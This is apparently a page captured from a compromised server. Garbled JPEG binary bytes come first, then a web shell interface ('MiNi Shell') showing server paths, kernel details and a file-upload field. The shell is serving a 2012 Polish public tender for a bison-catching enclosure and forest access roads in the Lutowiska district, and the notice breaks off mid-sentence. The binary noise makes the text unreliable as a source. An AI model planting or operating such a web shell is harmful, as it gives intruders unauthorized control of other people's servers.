JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120321/65635-N-2012.html

<p class="kh_header"><b>Lutowiska: Wykonanie odłowni i dojazdów do miejsc dokarmiania i odłowni w Nadleśnictwie Lutowiska w ramach projektu Ochrona in-situ żubra w Polsce -część południowa.  Zn. sp. NZ-2710-02/12</b><br>
<b>Numer ogłoszenia: 65635 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Lutowiska , Lutowiska 4, 38-713 Lutowiska, woj. podkarpackie, tel. 013 4610168 w. 43, faks 013 4610168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl/web/lutowiska, e-mail: lutowiska@krosno.lasy.gov.pl,    fax.: 13 461 03 88</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Lutowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie odłowni i dojazdów do miejsc dokarmiania i odłowni w Nadleśnictwie Lutowiska w ramach projektu Ochrona in-situ żubra w Polsce -część południowa.  Zn. sp. NZ-2710-02/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wg. pkt.  3.1.  SIWZ. Przedmiotem zamówienia jest wykonanie odłowni i dojazdów do miejsc dokarmiania i odłowni w Nadleśnictwie Lutowiska w ramach projektu Ochrona in-situ żubra w Polsce - część południowa, które ze względów organizacyjnych podzielono na dwie części:

Część nr 1 
Dojazdy do miejsc dokarmiania i odłowni.
Zadanie obejmuje wykonanie dojazdów do miejsc dokarmiania żubrów oraz poprawienie istniejącego dojazdu do odłowni.
Prace polegają na utwardzeniu istniejących szlaków zrywkowych poprzez wsypanie tłucznia w koleiny i zagęszczenie.

Część nr 2 
Budowa odłowni  o powierzchnia 0,50 ha.


Zakres prac objętych przedmiotem zamówienia:

Część nr 1 - Dojazdy do miejsc dokarmiania i odłowni:
- działka ewidencyjna nr 26 obręb ewidencyjny Serednie Małe prace obejmują wyrównanie i utwardzenie istniejącego szlaku zrywkowego na długości 600 mb poprzez wyrównanie spycharką gąsiennicową i ręczne wsypanie tłucznia w koleiny i zagęszczenie
- działka ewidencyjna nr 646 obręb ewidencyjny Polana, prace obejmują wyrównanie i utwardzenie istniejącego szlaku zrywkowego na długości 300 mb poprzez wyrównanie spycharką gąsiennicową i ręczne wsypanie tłucznia w koleiny i zagęszczenie
- działka ewidencyjna nr 130 obręb ewidencyjny Skorodne, prace obejmują wyrównanie i utwardzenie istniejącego szlaku zrywkowego na długości 300 mb poprzez wyrównanie spycharką gąsiennicową i ręczne wsypanie tłucznia w koleiny i zagęszczenie
- działka ewidencyjna nr 86 i 87 obręb ewidencyjny Tworylne prace obejmują poprawienie istniejącego dojazdu na długości 1200 mb poprzez wyrównanie poboczy oraz ręczne wsypanie tłucznia w koleiny i zagęszczenie.

Miejsce realizacji zamówienia (lokalizacja): 
Teren Nadleśnictwa Lutowiska. 

           a) działka ewidencyjna nr 26 obręb ewidencyjny Serednie Małe
           b) działka ewidencyjna nr 646 obręb ewidencyjny Polana
           c) działka ewidencyjna nr 130 obręb ewidencyjny Skorodne
  d) działka ewidencyjna nr 86 i 87 obręb ewidencyjny Tworylne

Część nr 2 - Budowa odłowni:
Parametry odłowni: powierzchnia 0,50 ha, długość ogrodzenia do 300 mb. Brama wjazdowa o szerokości 5,00 m otwierana za pomocą liny lub dźwigni, która obsługiwana będzie z paśnika położonego przy odłowni, po wejściu żubrów do odłowni będzie można bramę zamknąć z pomieszczenia znajdującego się w paśniku.
W odłowni należy wykonać rękaw (szydło) do odławiania pojedynczych sztuk zwierząt,  rękaw ma być zakończony kieszenią.
Metoda wznoszenia - tradycyjna.
Przewidziano konstrukcje drewniana i stalową -konstrukcja drewniana z okrąglaków dębowych średnicy 20-25 cm posadowiona -1,20m poniżej gruntu obetonowanych mieszanką chudego betonu i kamieni, zaklinowanie żerdzi w 5 rzędach z okrąglaków o średnicy 15-20cm. 
Konstrukcja stalowa słupowo-ryglową, z elementów stalowych na stopach betonowych. Rozpiętość przęseł ogrodzenia w osi  - 2,20; 3,00 i 5,00m.

Miejsce realizacji zamówienia (lokalizacja): 
Teren Nadleśnictwa Lutowiska. 
działka ewidencyjna nr  85 i 87 obręb ewidencyjny Tworylne.


wg. pkt. 3.2. SIWZ. Szczegółowy opis przedmiotu zamówienia dla poszczególnych części zawiera  dokumentacja projektowa, przedmiar robót oraz specyfikacja wykonania i odbioru robót  stanowiące załączniki nr 1a-c do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.20.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wg. pkt.  8.1. SIWZ. Zamawiający żąda zabezpieczenia oferty w postaci wadium w wysokości 
            
          1 000,00 złotych (na każdą część oddzielnie).

wg. pkt. 8.2. SIWZ. Wadium może być wnoszone w jednej lub kilku      
     następujących  formach: 
        a) pieniądzu; 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek wskazany przez Zamawiającego;
Numer rachunku bankowego na który należy wnosić wadium: 
 Bank BGŻ SA oddz. w Sanoku, 
 konto nr 26 2030 0045 1110 0000 0153 5050
z dopiskiem na  blankiecie lub w tytule przelewu, jakiego postępowania dotyczy,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
wg. pkt. 8.3. SIWZ. Wadium wnoszone w innych formach niż pieniądz należy deponować w oryginale 
     w kasie w siedzibie Zamawiającego  do dnia składania ofert  05.04.2012r., do 
     godz.14.00, przy czym  Zamawiający dopuszcza złożenie  w/w dokumentów  
     za pomocą przesyłki pocztowej lub kurierskiej lub złożenie wraz z ofertą.	
     Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób    
     reprezentacji Gwaranta (poręczyciela). Poręczenie, gwarancja musi być               
     podpisana   przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta   
     (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego 
     identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem  
     imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe 
     zobowiązanie Gwaranta do wpłaty Zamawiającemu pełnej kwoty wadium w 
     okolicznościach określonych w art. 46 ust. 4 a i ust. 5 ustawy, na każde pisemne   
     żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.

wg. pkt.8.4. SIWZ. Wadium musi być wniesione najpóźniej do wyznaczonego terminu    
      składania ofert tj. do dnia składania ofert 05.04.2012r., do godz. 14.00
      Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym 
      terminie znajdzie się na rachunku bankowym Zamawiającego.

wg. pkt. 8.5. SIWZ. Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, 
     a jego oferta zostanie uznana za odrzuconą.
a) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego,
  b)  Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy który 
      wycofał ofertę przed upływem terminu składania ofert,
  c)  Wadium Wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy  
      Wykonawca:
 -  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art.  25 ust. 1 ustawy lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn  nieleżących po jego stronie,
-   odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  
    określonych w ofercie, 
-   nie wniósł należytego zabezpieczenia umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
     z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego sposobu spełniania warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę budowlaną:
- o wartości nie niższej niż 30 tys. zł brutto. 

        W przypadku gdy Wykonawca składa oferty na każdą część postępowania nie jest wymagane posiadanie ww wiedzy i doświadczenia na każdą część oddzielnie.

Przeliczenia podanych w Wykazie robót budowlanych , wartości w walucie obcej, na złote polskie należy dokonać na dzień zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia (według średniego kursu NBP dla danej waluty), dla polisy lub innego dokumentu potwierdzającego posiadanie ubezpieczenia OC w zakresie prowadzonej działalności - wg kursu (według średniego kursu NBP dla danej waluty) z dnia jego wystawienia.

           Ocena warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa w ppkt. 6.1. lit. b) SIWZ tj. w oparciu o wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich 5 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie oraz w oparciu o dokumenty potwierdzające że roboty wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Poprzez posiadanie lub dysponowanie odpowiednim potencjałem technicznym     Zamawiający rozumie zasoby sprzętowe pozostające w dyspozycji Wykonawcy gwarantujące wykonanie powierzonego zadania inwestycyjnego, złożone co najmniej z:

Dla części 1 
- samochodu ciężarowego dwunapędowego  lub ciągnika kołowego dwunapędowego,
- spycharki gąsienicowej,

Dla części 2
- samochodu ciężarowego dwunapędowego  lub ciągnika kołowego dwunapędowego,
- samochodu terenowego.

        W przypadku gdy Wykonawca składa oferty na każdą część postępowania nie jest wymagane dysponowanie wymienionym ww potencjałem na każdą część osobno. 

     
         Ocena warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa w ppkt. 6.1.  lit.  d)  SIWZ tj. w oparciu o: 
- wykaz  narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych  
wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przez osoby zdolne do wykonania zamówienia uważa się dysponowanie do realizacji zamówienia:

Dla części 1 
-  co najmniej jedną osobą posiadającą uprawnienia budowlane w zakresie kierowania robotami w specjalności drogowej, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo  budowlane (Dz.U. z 2010 r. Nr 243 poz. 1623, ze zm.) albo odpowiadające im inne uprawnienie dopuszczone prawem lub dyrektywami.

Dla części 2
-  co najmniej jedną osobą posiadającą uprawnienia budowlane w zakresie kierowania robotami w specjalności konstrukcyjno-budowlanej, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo  budowlane (Dz.U. z 2010 r. Nr 243 poz. 1623, ze zm.) albo odpowiadające im inne uprawnienie dopuszczone prawem lub dyrektywami.

        W  przypadku gdy Wykonawca składa oferty na każdą część postępowania wymagane jest dysponowanie wymienionymi ww osobami na każdą część osobno tj. Wykonawca winien przedstawić inne osoby w każdej części postępowania.

          W przypadku, gdy wskazane przez wykonawcę osoby są obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą one spełniać wymogi określone w art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz. U. z 2010 r. Nr 243 poz. 1623, ze zm.).
    Ocena warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa w ppkt. 6.1.  lit. c) i  f)   SIWZ tj. w oparciu o:

-  wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezbędnych   wykonania zamówienia jakimi dysponuje wykonawca oraz informacją o podstawie dysponowania tymi osobami oraz w oparciu o oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają  wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać że jest ubezpieczony od odpowiedzialności cywilnej (OC)   w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę co najmniej 30 tys. zł .

W  przypadku gdy Wykonawca składa oferty na każdą część postępowania nie jest wymagane posiadanie  ww ubezpieczenia OC  na każdą część osobno.

          Przeliczenia podanych w Wykazie robót budowlanych , wartości w walucie obcej, na PLN należy dokonać na dzień zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia (według średniego kursu NBP dla danej waluty), dla polisy lub innego dokumentu potwierdzającego posiadanie ubezpieczenia OC w zakresie prowadzonej działalności - wg kursu (według średniego kursu NBP dla danej waluty) z dnia jego wystawienia.
Ocena w oparciu o załączony dokument potwierdzający posiadanie ubezpieczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy się dołączyć:
a)      Kosztorys ofertowy (oddzielnie dla poszczególnych części),
b)      Pełnomocnictwo osób podpisujących ofertę do podejmowania      
         zobowiązań w imieniu firmy składającej ofertę, jeżeli nie wynika to z     
         dokumentów wymienionych.

             Zaleca się również dołączyć do oferty dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wg pkt. 16.1. SIWZ.  Istotne dla stron postanowienia zawiera projekt umowy. 

Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następujących okolicznościach: 

wg pkt. 16.2. SIWZ. potrzeby wprowadzenia zmian w Specyfikacji technicznej wykonania i odbioru robót budowlanych, będących podstawą realizacji przedmiotu Umowy, wywołanej zmianami w przepisach prawa, normach i standardach, zmianami w wiedzy technicznej lub zmianą funkcji użytkowej, a także zmianami uwarunkowań środowiskowych, technicznych, technologicznych lub innymi okolicznościami.

wg pkt. 16.3. SIWZ.  potrzeby wprowadzenia zmian w miejscu i sposobie wykonania robót   budowlanych, wynikających ze zmian technologicznych, osobowych,  w organizacji spełnienia świadczenia, spowodowanych zmianami w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej, zmianami uwarunkowań  środowiskowych lub innymi okolicznościami.

wg pkt. 16.4. SIWZ. zmiany lokalizacji  inwestycji gdy konieczność ta wyniknie z badań  geologicznych lub  hydrologicznych lub z uwagi na możliwość  podniesienie jej  opłacalności lub  zaleceń organów opiniujących, zezwalających, kontrolujących lub innych.

wg pkt. 16.5. SIWZ. rezygnacji z wykonania części (całości)  zamówienia (umowy) w przypadku,   gdy:
a) z uwagi na  możliwość podniesienie jej  opłacalności, 
b)  na podstawie zaleceń organów  opiniujących,  zezwalających 
   kontrolujących lub innych,
c) ze względu na brak wymaganych pozwoleń formalno-prawnych  
   niezbędnych do realizacji prac,
              d) w razie zaistnienie istotnej zmiany okoliczności powodującej, że wykonanie 
